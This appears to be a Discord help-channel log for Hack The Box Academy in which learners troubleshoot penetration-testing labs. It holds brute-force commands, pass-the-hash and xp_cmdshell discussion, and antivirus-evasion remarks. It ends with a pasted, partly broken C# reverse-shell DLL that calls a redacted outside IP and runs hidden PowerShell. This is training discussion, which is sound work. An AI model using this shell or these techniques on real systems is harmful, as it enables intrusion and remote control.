#modules

By "you know the bug" I'm assuming you're using the guide that comes with annual

But reach out to support if you think it's broken

No i found it manually using burp 😂

The "right spot"

I only recall the first few "high" vulns being red herrings

As there is one that gets marked "critical" from what i remember

Yep

That's the problem
The zap active scanner is showing some medium and low vulns but the HIGH one is not even found

And yes i waited for it to finish

Btw Thanks for even responding dude

Did you do AJAX scan?

strange, never seen that before, but just hit me too
Same thing, US East was my default. Does not work for US West either, but for CA just like you said.

HTB team aware of that?

I guess no one seen this? lol

You can use whatever you want. Not a bad idea to learn other ways through that module though.

I'd recommend against it, use the tools taught in the module before using tools that make your life easier. Helps you better understand the fundamentals

I mean I understand the fundamentals…. Ligolo would be useless to me as well if I didint lol

I mean at the end of the day your choice

doesn't really matter which tool you choose to use

Hi, I've lost access to email what I've used to access my account, have other way to recover my account?

There's always something more you learn in the modules though.

Your HTB account? You'd have to reach out to support on the site.

Yes

Hello everyone

Module: Attacking Common Services - Easy

I've gotten the user and pw, and am following the course material to get a webshell. But the output isn't coming up in the browser when I run commands. I've changed the directory in the original command to match what I get from the Webserverinfo file, still nothing. Any hints here would be great.

hey guys how can i exploit a open 80 port?

which module this on?

what?

This is #modules so you must be talking about a module no?

https://academy.hackthebox.com/dashboard

yeah i am asking for a module

which one specifically?

any module that can exploit por t80

lol

which module/section on htb academy?

if this isn't academy related it doesn't belong here

i did it all wrong write 😂

labs

WHICH LAB?!?

what lab

you need to be specific

dont yell😣

Here you go: a bunch of modules that exploit port 80
https://academy.hackthebox.com/exams/2/where-to-start

dog lmao

Ohh. #boxes

Yeah, and be specific

ok

but don't reveal box info

alr alr

Going through the modules for Windows. It spawned the target without displaying the default credentials. Is there a fix for this?

ended up figuring this one out.

When brute forcing a non-standard port with hydra (e.g. FTP), is this syntax correct? hydra -L u.list -P p.list ftp://<IP>:<PORT> It's correct.

did u tried resetting?

Hello
I am doing windows privilege escalation > scf file
I set responder up and i get a hash but its the hash of "htb-student"
How can i get the "SCCM_SVC" user hash?
Thanks in advance

im having a really hard time with the blue team path labs, the windows machines are so slow

https://academy.hackthebox.com/module/103/section/984
Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag.

My server isn't listening any request. Anyone have a solution?

Hey guys!

I'm on https://academy.hackthebox.com/module/113/section/1100

I have added ip and vhost entry in the /etc/hosts file. And I'm on VPN but still can't reach.

Things I tried: which did not resolve it (timeout)

• used different region vpn file
• reset the machine and waited 5 mins
• restart the vm and host machine
• used space and tab in the /etc/hosts
• tried sudo for wpscan
• tried curl, wget - with and without sudo

But I can browse the the same vhost blog.inlanefreight.local after adding the entry from pwnbox(browser based vm from HTB) without any set backs.

Can someone please help me what I'm doing wrong?

this is my /etc/hosts

127.0.0.1       localhost
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

<ip>   blog.inlanefreight.local

might also have to add the base domain: inlanefreight.local

also ensure that the pwnbox and vpn aren't running at the same time

so the machine I RDP does not have internet connection, do I really have to trasnfer the github from my kaly via RDP...

Depends on which module, for most of them the tools should already be on the machine

<ip> inlanefreight.local blog.inlanefreight.local
like this?

terminated

I'm on Analyzing Evil With Sysmon & Event Logs and the machine I RDP does not have Symon installed

Haven't done that module so I am not familiar with its labs

still not working

and you're connected to the right vpn? you able to ping the ip?

I'm also having a hard time with connecting to a new machine now, target IP is not pinging

yes, I can ping with 0% packet loss

might wanna swap VPNs for both of you, and maybe adjust the MTU, but that's my best guess

I can reach inlanefreight.local on the browser
This is the inlanefreight.local default vhost

tried, still not working

how come pwnbox worked with just and without main domain in it
<ip> blog.inlanefreight.local

https://academy.hackthebox.com/module/110/section/1050
Exercise 2: Try adding a rule that automatically adds ;ls; when we click on Ping, by matching and replace the request body of the Ping request.

Hello. I am trying this exercise. It works but where can I learn regex and is this good?

https://regex101.com/

guys if Im doing the SOC Analyst job role path using a student subscription will getting VIP+ help with the module labs?

like peformance wise? Or is VIP+ only for normaly HTB and not Academy

I didn't get you. Academy and Labs are 2 different platform.

I see, so buying VIP+ wont help the Academy labs performances right?

What do you mean by performance? Both platforms are independant. Only if you get a the yearly plan you have access to both. But student plan only gets you the modules

Oh wait. I don't think you get VIP+ labs even on yearly plans of academy

Yup you don't it seems. Both the subscriptions are different.

so Im just trying to improve the labs in the module, for example I had to RDP into a Windows machine and it was a nightmare, so I was wondering if buying VIP+ could improve the peformance but I guess not since HTB and Academy are seperate subscriptions

Doesn't work that way

so theres no way to pay for more stable/faster labs in Academy?

Well you can get the Gold subs which have priority, but best performance goes to the enterprise academy which only exists for companies and their employees, they have dedicated servers for those

Is there a link with more info on the labs speed? I would definetly be intrested in Gold if they offer more stable/faster labs. I dont see any mention on the billing page of a peformance different between student and gold for example

I personally think it's part of the experience. Like when you are pentesting or bug bounty hunting there's loads of data you probably go through and it takes time. That time compensation is like experience to test your patience.

idk about that, time is money and if the module labs are slow/buggy is just a matter of time before the learner quits and doesnt come back. I see it as an business opportunity, offer high performance on the Academy labs in the high subscriptions

Module labs/assessments are very fast. I have never encountered a slow response

does the Gold subcrioption actually provide faster and more stable labs? "Priority" I dont see any mention on the billing page, I will be very interested in upgrading if so

Gold subscription offers alternative VPNs which would provide more isolation hence, better performance. That being said: gotta deal with it, as for RDP, using TCP VPN might be better.

awesome thank you!

For any issues you experience with the VPN and the connectivity, it is best to reach out to support for better troubleshooting

Can someone help me with Prototype Pollution RCE (Whitebox Attacks), I am trying to follow the steps but the command injection is never executed in the provided application. Also in the debug console log I dont see this:

But only this:

anyone here solved planning machine im stucked help me

#boxes, if you don't have access get identified, instructions -> #welcome

Even when I clear it and set the command in Debug console, it is never executed and here is the correct Debug Console image:

That section is basically a walkthrough. You pass the $Cred variable as -Credential parameter in the following commands and that uses this context for authentication instead of the local user.

but 'whoami' doesn't change

Also tried with the 'constructor' to bypass "__proto__" still no luck, Can I DM someone for support?

Yes, because the credentials are only valid to authenticate via the network and whoami uses the local context. This is intended.

Ah okay, thanks a lot

Hey there, has anyone worked on the "Introduction to Splunk & SPL" Module, I would love some help!

Can anyone point me in the direct for getting Havoc beacon via xp_cmdshell? Done it in the past using Powershell payload but Havoc doesn't support this afik

hi everyone. im stucked at AD Enum& Attacks module DCSync section. i cant ssh into the linux host as it says during the section (i got wrong creds error). can someone help me?

I've usually just use mssqlclient to use xp_cmdshell to do command things, which includes moving and executing files, that included Havoc beacons.

Thanks, AV is removing the Havoc .exe, might try obfuscate that, I have some shellcode loading via .dll which isn't detected, so was trying to use that same shellcode

Gotcha

I have a question regarding SMTP user enumeration, it seems like the "smtp-enum-users" cannot identify the correct users if a user list is provided.
has anyone else faced this issue?
For instance, smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t <ip>
won't give any valid user even if the valid user is in the user.list

There's more than RCPT

VRFY for instance, exists

And depending how it's set up; you may need a domain

I tried all three, also the module solution did the same thing I did and it did got the user

interesting thing is that if we specify the direct user instead of a list, -u <user>, then it does indeed detect that user as valid

Try messing around with the timing

I believe it's -w or -W (been a minute)

It could be that the tool is going too fast and not waiting on the response

yeah I played around with the timing the issue still persists, even on the attack box

did you try setting the timeout to 20+ seconds?

you can also try the metasploit one or the nmap script

i just did it myself, set timeout to 25 seconds, and it came back
<ip>: <username> exists

I tried 50 and 100 too same thing, thanks though

I'll look into it.

i used the provided footprinting-wordlist

i'm assuming you're referring to the footprinting: smtp section yeah?

yeah I used the worflist provided in the resources tab, to be exact I am doing in the easy lab of Attacking Common Services.

I just restarted the machine and the issue just got resolved.

kinda weird

@zinc halo don't reveal information about a skill assessment; the short answer is - logical thinking
why is it password protected
can it be reused
try reusing it

okie, yah that make sense i guess, thanks!

i did not know it could be reused like that but good to know now! thanks!

it can be; doesn't mean it should be :) best practices

ah.. i seee

but consider that the user is a sysadmin or some such role and should have those types of rights/access so best practice is

• limiting access to root user ✅
  however
• reusing a credential ❎

this happens in the real world too

humans are lazy

I wonder if such issue pops up in exam

oh yah that make sense i was just wondering how it could be reused like that then i found out you could place that certain file in a certain folder for it to be reused, thanks!! this is really helpful

when do I knnow to reset a machine

if you feel you've exhausted all available options and that you're 100% sure what you're doing is right

I see

thanks

if you're unsure the env is broken, you'll have to reach out to support

but you can reset the environment unlimited times

understood

Hi there, I'm on Windows Priv Esc > Further Credential Theft.

Been stuck on flag two for the last little while, I used Lazagne on user jordan to find the first flag, I now have RDP access into a higher privileged user, still not getting much for flag two. I've tried everything in this module, couldn't find any PuTTy Sessions, nothing in SessionGopher etc... Would love a hint if anyone could help thanks.

Hello

I’m new at ethical hacking

I want be a good hacker or coder

But i don’t know much

Like ik html a bit and a bit python

Can anyone teach me how can i be a good hacker please

hi

https://academy.hackthebox.com

Nobody will teach you for free, we ALL pay for it. So can you

i cant get my RDC to connect to the target system it says server not enabled computer is turned off not available on the net work

do i need to have the vpn turned on first?

Yes you need to be connected to the VPN

ok thank you

hi

Download VPN connection,

sudo openvpn academy-vpn.ovpn

so i shouldn't connect with my personal pc?

Is it your attack machine?

If it's a personal machine, no 100% dont

you should be connecting with whatever machine you're using to do the content with

I highly recommend looking at "Setting Up" module, it will help/guide you into recreating a Virtual Machine for you to use

i.e. if you're using a VM; you connect in the VM, not on the Host

ok i will just stick with the vm that is for use

Yes, the pwnbox is just as good 🙂

The VM that's available to you does NOT require you to setup VPN. It's already configured, you only need to configure if you're using your own machine

Hi guys.. I need help
I’m in public exploits (just getting started) section and I’m doing the challenge
I know how to exploit the vulnerable plugin with metasploit but it’s not working.
It does not output what I want.
I have tried exploit db python script and it’s the same issue.
I looked in the specific code to get the exact url I need to exploit the vulnerability but the request is timed out and doesn’t return anything.

Did anyone encounter this problem?

I’m stuck on the pass the hash section I’m trying to get the reverse shell from DC01 I’ve used to the reverse shell command and it says command executed but I’m not getting a connection on my nc listener

iirc all you need to do is visit the webpage and it tells you all the info you need to get the info
you have to make sure with the exploit you specify the RHOST and RPORT
RHOST - Remote Host IP
RPORT - Remote Port

I have done that.. it shows success but it doesn’t output or show the file content

I’m running ps as admin and used mimikatz for the user Julio any hints to a step I’ve might missed

well generally speaking it's not gonna show the file content, it should tell you where it saved the file to, if you're using the right exploit

did you try running the command in cmd instead of powershell?

I did not

if it's the portion i'm thinking; whenever there's a black background, the command is expected to be run in cmd; blue is ps

Okay I was confused on that part

Thanks

i believe the text also tells you to run it in CMD

or Command Prompt

Do you need to use proxychains?

Just trying to remember when I did it

Hey, Guys I am stuck at this question: Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt. ..... under the password attacks pass the hash module. I have authenticated as David user with the hash but still it's giving not enough rights

@north bramble please don't share passwords -_-

sorry.

proxychains is only if you're pivoting using a tool that may utilize it, i.e. using socks4/5 protocol

Hi people!

I'm currently unable to work on a final skill assessment. As soon as I log in using the credentials provided for the exercise, I get kicked out immediately. The system shows the following message:

"Connection reset by peer client_loop: send disconnect: Broken pipe"

Could someone please assist me with this issue?

Module: Linux Privilege Escalation
Page: Linux Local Privilege Esclation - Skill Assessment

any idea why it isnt working?

Hi, try every VPN file until it works. I'm sorry it's the only solution I've been given

no idea

What module >lesson?

Hi, did you use Mimikatz to use David's hash in privilege debug mode?

Yea

Thanks Matthew99, I will try that

Goodluck, I had a nightmare with that myself. 4th VPN I finally got no broken pipes

also used psexec but yea still permission error even when I am authenticated as david with admin

Vans, can I dm?

sure

I still can’t get the reverse shell when I try to run the commands in black (cmd) at the top of it it says it’s in powershell but it’s in black

Anyone know if GodPotato is patched? Trying it on Win11 and WinServer2019 and get this error

[*] CurrentUser: NT AUTHORITY\SYSTEM
[!] Cannot create process Win32Error:2

sometimes the captions are wrong

what does that have to do with academy modules?

It's in one of the modules

ok but are you doing it on a module, or no -- that's the key distinction :)

I'm working through the module and testing it on my VMs

I'm asking if it's patched since it works in the module but not on my VMs

if it works on the module i wouldn't really be concerned. ¯_(ツ)_/¯

it's likely just a minor thing

testing on your own vm != doing it within the module

huh, it's an academy for learning... ?

if it's working on the module, and not on your own vm => the question belongs in a different channel

i.e. #red-team or something like that

can someone help with active directory dcsync section. There are two ip's given at the end of the subject assessment.. I can rdp into one but what is the other for ? I tried to ssh to it w/ adunn and htb-student creds and I cant. Help would be appreciated.

thanks

is it something like ea-attack01 or ea-parr01 r something like that?

i can't see the Windows taskbar when connecting to the VM that you gave us access to if i hit my windows key it pops open my windows also is that something i am just going to have to deal with?

the credentials are given in like the setup section of the module

yup, first box is ACADEMY-EA-MS01, second box is ACADEMY-EA-ATTACK01

/dynamic-resolution then resize the screen with xfreerdp

thank you

there's a section that gives you credentials for the attack box

Hey guys i want to use any good browser but what browser should i do people says fire fox is good but others says duck go duck is good wich one

firefox is fine, so is ddg, it's just personal preference really

ughh quick question, do I type that command in bash ?

it's part of the xfreerdp command

thank you

for being such a helpful person 😄

i would have figured that out if i just use man xfreerdp sorry >.>

another nifty thing that plenty of us use with xfreerdp is the /drive: option :)

ill have to google that because im not understanding the 2ed part of the description

that latest version of xfreerdp is xfreerdp3 incase you guys runinto STDERR

plus i would really love some mentorship from the senior hackers , i have completed the windows and linux fundamentals now should i complete this module or should i go into another module since i'm not really looking to be an android pentester this summer. What should i do?

@craggy urchin Thank you !

Hi there, for one of the module, i got a valid username and password for rdp, but crowbar doesnt seem to see it as a valid credentials when i try to bruteforce the rdp using that exact username and password, any idea why that would be the case? thank you!!

did you check the wordlist for any blank spaces?

yah i did

so weird

what command did you use?

crowbar -b rdp -s xx.xx.xx.xx/32 -u username -C test.list

if you have the target ip address why use the entire subnet?

the only thing i could think of, is when i install crowbar it was asking for xfreerdp but i am using xfreerdp3 so i created a symlink for them

try it with the target ip address rather than bruteforcing the entire subnet mask

im not tho? isnt /32 the one ip for that target tho

no

no?

nope 🙂

why are you doing /32? at all

coz crowbar would not work if there is no CIDR specified no?

one sec ill try it

it should work without a cidr

check the tool's help page

and find out the argument that can be solely used for targeting the singular ip address

thats what it was telling me

if i get rid of CIDR it does not wanna run

looking into it; it looks like /32 is intended for single ips with crowbar

i got it from the kali tool page https://www.kali.org/tools/crowbar/

and -p is for specifying a port

though i personally didn't use crowbar for bruteforcing rdp; i used hydra

yah i tried hydra it is taking forever for me thats why i saw it on the forum to try crowbar 😦 but for some reasons it doesnt wanna work

@zinc halo does the list for credentials solely specifies passwords or the usernames too?

the official github repo https://github.com/galkan/crowbar

only one password

and the valid one as well

if it's one password you can just use -c 'password'

true ill try that as well one sec

it also helps if you say what module you're working on

nope doesnt wanna work 😦

instead of just saying "in one of the modules"

i was trying not to sploi it

dude, fr

ppassword attacks lab - hard

the spoiling is if you specifically say what the password/username is

i just got warned earlier

fair

or if you reveal the password in a screenshot, or a flag, etc

i assume this is for the first question? how did you determine that the password is, in fact, correct, have you tried other tools besides crowbar?

yah i got it from hydra, and it worked for rdp but i thought i wanna try it to see if crowbar is indeed faster but

could also be that it's timing out before crowbar gets a response

it doenst seem to wanna work

@zinc halo try removing the subnet and use the -s command e:g -s <targetip>

zaarc

respectfully

looking into it; the /32 is required for single ips

let me try that

@fathom pendant yes i'm looking at the man page but i found the static target option

-s is literally the option they're using

@fathom pendant sorry did'nt focus on the keyword arg there

also as a note @zinc halo you can use 10.129.x.x for the outward facing ips for private targets, that's not really a hidden fact

yah increasing -t does not work either 😦

Hi everyone, I'm doing skill assessment part 1 from login bruteforcing from CBBH, and if you are wondering yes, I'm using the given username and password list but will these even take lot of time to crack? , It is atleast showing me 3h to crack using hydra

okie

estimated time != actual time

ohh okay but atleast it seems to me that it will take a lot time to go through the list .

just have patient

sure !

as a note: always start with the wordlists given

then branch out

use wordlists that the module may have mentioned

as a LAST resort use rockyou

yeah, I'm using the given wordlists,and also if the skill assessment have given specific wordlists to use i don't think i would ever need to use other wordlists right?

generally speaking if the skill assessment tells you to use a specific wordlist, download/use that wordlist

I will thanks for it .

i just realized my mistake why it was taking a lot of time , when i downloaded the username and password list , wget downladed the html page instead and i was using that all this time and was wondering why this is taking so long , dang it!

I again downloaded it properly and it was an instant finding

Oof

hi

i have a question

i m doing a machine in htb named planning

the ssh port is open

If I'm able to find credentials for modules ahead of what I'm learning, does that mean I'm probably going too out-of-scope with my lessons?

when i do and put the pass it says wrong pass

Wrong section, please go to #boxes

but the pass is given

bro

rly

can u help me

i can try

dm me, pls dont spam the chats

ok

Nah I'd say you're kinda working your own methodology, instead of jumping back and forth. I found the thing for the protected archives section way ahead of the section, for instance

Also you mean sections, not modules

Modules are the learning units, sections are the chapters within the units

Thank you btw, my dictionary needed that lol

And yeah I totally getcha, When I get stuck I'm using the other content to try to get ahead without having to look back at questions, getting answers for things I shouldn't be getting yet lol

I think in one of the modules I captured like all the hashes lol instead of going back and forth

Does anyone know if "+clipboard" with xfreerdp can copy/paste files? I've been trying to learn an easier way to transffer files from target to attack machine

lol yea i can def relate to that

Yes +clipboard enables clipboard, though usually it should be enabled. +clipboard allows for easier copy/paste

how come you never went for CPTS Marcie? Idk if you've been asked a million times but I seen ya here when I first joined and shocked you havent got certs

Xfreerdp has the /drive: option though for mounting a local directory to the session

I've said time and again the reason currently for not having it

I really don't feel like answering it a million times

You didn't have to explain it sorry lol

But thanks for the insights on clipboard/freerdp I'll give that a shot. Sorry to disturb, take care & have a lovely day

Hi everyone,
I have a little question about one optional exercise in the module "Cracking Passwords with Hascat" in the section "Cracking Common Hashes" the optional exercise about ntlmv2 and ntlm i still don't get how i'm supposed to get to the answer.

I hope someone can give me a clue.

Thanks for the help

Does HTB want me to follow and execute the steps they do/talk about on my "own" VM: Pwnbox? i'm just clueless that why i wonder. thanks in advance!

Hey guys, module: Introduction to Malware Analysis section: Dynamic analysis, when Im stopping Noriben, It don't want to save the logs from procmon? ANy Idea?

Help, I’m stuck on the medium level for the enumeration with Nmap lab

Also just for another point of view, how can I get info on how other people solved the easy lab

If it's the module called Network Enumeration with Nmap, DM me. 🙂

If not that one, haven't done it yet 😄 It's a part of the basic toolset

Hi everyone,
I have a little question about one optional exercise in the module "Cracking Passwords with Hascat" in the section "Cracking Common Hashes" the optional exercise about ntlmv2 and ntlm i still don't get how i'm supposed to get to the answer.

I hope someone can give me a clue.

Thanks for the help

Yes, the spawned target is a replica of the nibbles machine - and this is detailed steps on how to root it

You can look up the hashcat example hashes for the list of hash modes

If someone else needs a hint for it, nmap uses TCP to probe, can we try something else?

Okay with that i know i have ntlm hashes from a ntds.dit dump and a ntlmv2 hash from a responder and i also check the answer of the exercise but i don't understand the link with the ntlm hash of the user.

Look up ntlm and windows

Ntlm hash of the user is in very basic terms the password hash of the user

Okay i see that now but how could i have achived this result with what they teach us in the module, apart from doing random things until i found something ?

Google is powerful, and you can expand the info beyond strictly what's taught

Okay i'll continue to search thanks for ur help and have a great day.

anyone else having difficulties connecting to targets?

Hi - On Getting started - Service Scanning- How am I supposed to find bob's password to connect to SMB for the last question?

Works for me, but VPN seems to be slower than usual 🙂

Share the link for the task, might have it solved, think I remember a bob

Read the section carefully

His pw is in the reading

reading carefully often leads me to the answers across many modules 😛

Im doing Pass the Ticket (PtT) from Windows within the Password Attacks module but I can't seem to export the tickets no matter what I try.

reach out to instagram's support, we can't help

Are you using an elevated cmd prompt/PS session?

yea

Also tried in both PS and CMD

tried with both Rubeus and minikatz

You can DM your command and outputs if you'd like.

Thanks!

Evening I have been struggling with the following question for the past couple days now:

Reproduce all the debugging procedures mentioned in this section and provide the hidden shellcode-related hex values from the final screenshot as your answer. Remove all spaces.

In the walkthrough, the following changes are to be made to avoid triggering "Sandbox Detected

1st change: cmp dword ptr ss:[rsp+0x30], 0x1 to cmp dword ptr ss:[rsp+0x30], 0x0

2nd change: je shell.402F09 to jne shell.402F09.

3rd change : jne shell.402CD0 -> Changed it jmp shell.402CD0

I'm still geting a sandbox detection

Introdution to Malware analysis Debugging section

it should go without saying to not visit that discord link that was posted if you saw it

https://tenor.com/view/bonk-gif-19410756

How long is MailSniper.Get-GlobalAddressList supposed to take? What does it mean by "This may take a while"? Forever? Been waiting at least an hour for it to run.

(MSSQL, Exchange, and SCCM Attacks § Exchange § Enumeration)

that's not what this server is about

Oooo

i don't advise on admitting to illegal activity :)

Sorry for misunderstanding, i was just worried because i’m trying help people for not get scammed

read #welcome to see what this server is actually about

that's great and all; but this server isn't about hacking scammers

I won’t do this mistake anymore, hope you forgive my mistake for what i did.

Hey why is my name owen mc verify?

Who did that??

Read #welcome

Oke

because your username contained characters outside the latin standard alphabet, so it was changed so that we can more easily @ or ping you if necessary, or issue other actions behind the scenes

DAYMMMMMM

IM TRYIN CREATE HACK THE BOX ACC

I PUT NAME LAST NAME AND THINGS IT SAYS ITS TAKEN

chill

no need to put caps

bro i’m stressed i been 1 hour trying

then i guess be more creative with your username idk what to tell you

I been more creative than i be at school

With the name

¯_(ツ)_/¯

Even my cat is confused🤣

Anyways

Can you js do any other name not owen mcVerify 🥲

no

it's not up to me to decide

Oooo-

Then who? Decides??

the robot overlords

also this is all irrelevant to the channel topic

so i'm gonna put an end to the convo here

Aah alright

if you're having issues coming up with a username for HTB; idk use a random name generator or something

I’m going sleep Marcie, God bless you

Alr bet💪🏻

mashallah

Yoo ya muslim(?

no; also irrelevant

gonna bump this for you

Hi can someone help me with the HTTP Attacks Log Injection I can t figure the way to get an RCE

the linux privesc assement is currently unplayable

it kicks me out of ssh after about 5 seconds, and i get other ppls history when i use that command

guys what results should I trust for find command results: ssh from your machine or HTB pwnbox? They seem to show different results for similarly worded find command? Why is this even happening? I thought all target machines are the same? I see more results in pwnbox than ssh method.

pwnbox is NOT the target; running find in the pwnbox environment is just checking the pwnbox, unless i'm misunderstanding

Correction: i used bash in pwnbox

that doesn't clarify anything

are you ssh into the target from pwnbox; or running the find command in pwnbox

Okay let me clarify

I was doing the Linux Fundamentals: Find Files and Directories. I did the the command find / -name *.conf 2>/dev/null

first on my machine ssh to target machine using terminal

yeah what in the world im sshing into the same machine, and when i ssh into it once I see nothing, a normal setup. but i ssh into it again and i see someone elses history they tried to use for this machine before I get disconnected

then i did the same thing to bash in pwn box

I tried switching servers but I'm on the 3d us server and the same issue is happening

I get a different list

different list of files.

the bash results from pwnbox on find command is way more extensive than ssh to the target machine.

bash in pwnbox is not the same is the environment of the target

the pwnbox is it's own attack machine, independent of the target spawns

you'd still need to ssh to the target from it to perform the tasks

Ahh I see.

so yes: the pwnbox will have a different list than the ssh to the target... because the pwnbox is NOT the target

as i said prior

pwnbox => attack box alternative to using your own vm
target => the thing you attack/connect to to perform the tasks (if required) by the section

Got it. That make sense now.

Thanks

note: you should not be using the pwnbox and your own vm at the same time when attacking targets, due to how the vpn packs are handled - the Internal IP provided (tun0 ip) is hardcoded into your vpn pack, and the pwnbox utilizes this same pack (automatically on startup) to connect so you get 2 devices with the same IP on the same network... (not good)

That probably explains why my machine slows down or even hangs when i do that.

I will avoid that next time.

Why does WSL curl keep timing out on the section of MSSQL, Exchange, and SCCM Attacks dealing with Exchange version enumeration?

Serious question here for anyone who has been studying for a while… did you ever hit a point where you lost all energy for this? Near the end of April I got sick and I haven’t been able to get myself to do anything on htb since. I’ve never felt a burnout like this in my life. It’s like all the joy I got out of this is gone

1/3 of the way through the pen testing path

Gotta find that spark again.

take a break; let your mind rest; don't force the issue

do things unrelated to htb

maybe some coding projects

you'll get back to it when you're ready, but forcing yourself when you really don't want to do it is just gonna make the feeling worse

Hey! excuse me, i am getting a lot of broken pipe when connecting with SSH

is anyone noticing a similar thing?

If it's the linux privilege escalation lab then it's a known issue

Otherwise try and changing your VPN interface MTU

it's more like file transfer

probably, i will check that!

This isn’t related, but, how come I can’t talk in general chat and stuff?

To chat in #general go identify your account, instructions -> #welcome

ehhh my name just means red in japanese

They combined the accounts some time ago, should be the same account now

Oh really? damn noice

one account to rule them all

https://tenor.com/view/lord-of-the-rings-looking-reading-ring-gif-23305215

ahhhh i really couldn't get the code because of the broken pipe issue, i changed the VPN server too

https://www.ibm.com/support/pages/how-do-you-change-mtu-value-linux-and-windows-operating-systems

as I mentioned befeore: try adjusting the MTU

This is not that kind of server we don't allow any services like that here

Oh sorry

Attacking Authentication Mechanisms module's "Attacking the Signing Secret" section, I cracked the JWT token and forged the token with the secret key and changed the isAdmin to true, but the server won't accept it. It says "Token is Invalid".

I believe I am doing every step right, but I've hit the wall. Was anyone in the same situation before? If so, can I get a hint on how you solve it?

I started up the CPTS path in September 2024, I’m now finally just about getting it finished with a solid half year break.

For someone with no prior experience - The burn out came so hard after about 35-40% so honestly I’d just say it’s normal man. Take the break you need, and trust me if it’s meant to be you’ll come back

i have felt burnout at several modules and last week too but the thing i did was when i am feeling burnt out i gone out with family or friends spend a day or two with them and after that i felt way too energized and better mindset than before

Fuck yeah, buddy.

... and I just figured out the thing that I was stuck on, too!

hello

Hi, welcome. Read the #rules and follow the instructions in #welcome to gain access to most channels.

Reminder that even if you use spoiler text: posting spoilers is still not allowed -_-

Sorry, I tried not giving too much away but wasn't sure exactly how to explain the steps I had taken so far without some of that key info... Any tips on how to better provide context without rule breaking?

Yes, just ask for help with module X and section Y. Discuss the rest in dm

That's fair, I did a search and tried to organize my ask as others did. Ill keep that in mind, sorry guys!

No worries at all

But did you get the answer you need? I can have a look when I get on my pc in an hour

Yeah I solved it on my own and added an edit to the end of it.

Okay 👌

so... PHP just kinda is a web shell, huh?

It's a programming language that can use functions to act a webshell

Python Library Hijacking (Linux privESC)
when trying to follow along with example (as the question said)
getting this

i do have the privs to run it as root tho without password

@blazing loom I know Getting Started is tier 0, but still please don't give solutions to the challenges.

Ah no problem. I figured since it was already in several other messages in this channel that it was already spoiled. But I'll refrain in the future regardless.

currently doing linux priv esc skills asses and when connecting via ssh i get instatnly disconnected. anyone had this issue?

did you only put the target ip address inside the reslovers.txt

still need assisstance

he means, did you make sure that all the other resolvers are commented out?

only ip in the file?

hi im doing the information gathering web edition,
on the skills assessment using recon spider
python3 ReconSpider.py http://<subdomain>.inlanefreight.htb:<port>

doesnt work for me, ive correctly found it with gobuster but reconspider just refuses to work

added subdomain in /etc/hosts?

yup checked both of these

Any ideas

the skills assessment

anybody can guide me on android fundlementals module how to set up the testing environments?

yea it does, just did it, theres content in the results.json

This is not the way... you only have sudo access to run the binary not to set environment variables 😉

yea i did the binary way but then why does the question said try every thing mentioned in module 😭

are they trolling ?

damn.. thanks man that helped a lot

Yeah is a lil troll

I guess they meant to try and see if it works

nono its fr, i kept thinking the first subdomain was correct but i just needed to enum more

Anybody eller have issues with ssh on academy? Trying to ssh in on linux file transfer methods but keep getting broken pipe and get disconnected.

htb-student@nix04:~$ gunzip Read from remote host 10.129.227.45: Connection reset by peer
Connection to 10.129.227.45 closed.
client_loop: send disconnect: Broken pipe

Didn't have time to complete the command 🙂

Tried both vpn and pwnbox.

also, why is there a diff between HTB recon spider and kali's reconspider, is there no where else i can get HTB's version

Ok, I'll try that thanks 🙂

I’m having the same problem

On Linux priv esc

same issue right now

Didn't work changing VPN and looks like a few others have same problem.

Yah! Thanks for taking your time

hey, i am doing the SQLMAP essential module and I try to input flag5 content as the answer but for some reason it's not working, any adivce?

can anyone help me i am not getting reverse shell back in password attacks pass the hash question

i feel like i am doing everyhting correct it also say executed but i dont get shell

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

My english is weak or I'm not getting this . From the module Boken auth CBBH, this phrase is worded so weirdly i can't seems to understand what it is trying to tell me .

Seems straightforward to me

Windows Evasion > LOLBAS: RunDll32

For some reason I keep getting this error when attempting to run my Dllmain function Missing entry: Dllmain

I did install the NuGet DLL Export Package and compiled with Release ANY,x64,x86, I did NOT get prompted to Reload All

using System;
using System.IO;
using System.Net.Sockets;
using System.Diagnostics;

namespace RShell_D
{
    internal class Program
    {
        private static StreamWriter streamWriter; // Needs to be global so that HandleDataReceived() can access it

        [DllExport("DllMain")]
        public static void DllMain()
        {
            try
            {
                // Connect to <IP> on <Port>/TCP
                TcpClient client = new TcpClient();
                client.Connect("<REDACTED-IP>",1010);

                // Set up input/output streams
                Stream stream = client.GetStream();
                StreamReader streamReader = new StreamReader(stream);
                streamWriter = new StreamWriter(stream);

                // Define a hidden PowerShell (-ep bypass -nologo) process with STDOUT/ERR/IN all redirected
                Process p = new Process();
                p.StartInfo.FileName = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe";
                
                p.StartInfo.Arguments = "-ep bypass -nologo";
                p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                p.StartInfo.UseShellExecute = false;
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardError = true;
                p.StartInfo.RedirectStandardInput = true;
                p.OutputDataReceived += new DataReceivedEventHandler(HandleDataReceived);
                p.ErrorDataReceived += new DataReceivedEventHandler(HandleDataReceived);

               

 // Start process and begin reading output
                p.Start();
                p.BeginOutputReadLine();
                p.BeginErrorReadLine();

                // Re-route user-input to STDIN of the PowerShell process
                // If we see the user sent "exit", we can stop
                string userInput = "";
                while (!userInput.Equals("exit"))
                {
                    userInput = streamReader.ReadLine();
                    p.StandardInput.WriteLine(userInput);
                }
        // Wait for PowerShell to exit (based on user-inputted exit), and close the process
        p.WaitForExit();
        client.Close();
    }
    catch (Exception) { }
    // CODE EXECUTION
    }
        // Wait for PowerShell to exit (based on user-inputted exit), and close the process
        p.WaitForExit();
        client.Close();
    }
    catch (Exception) { }
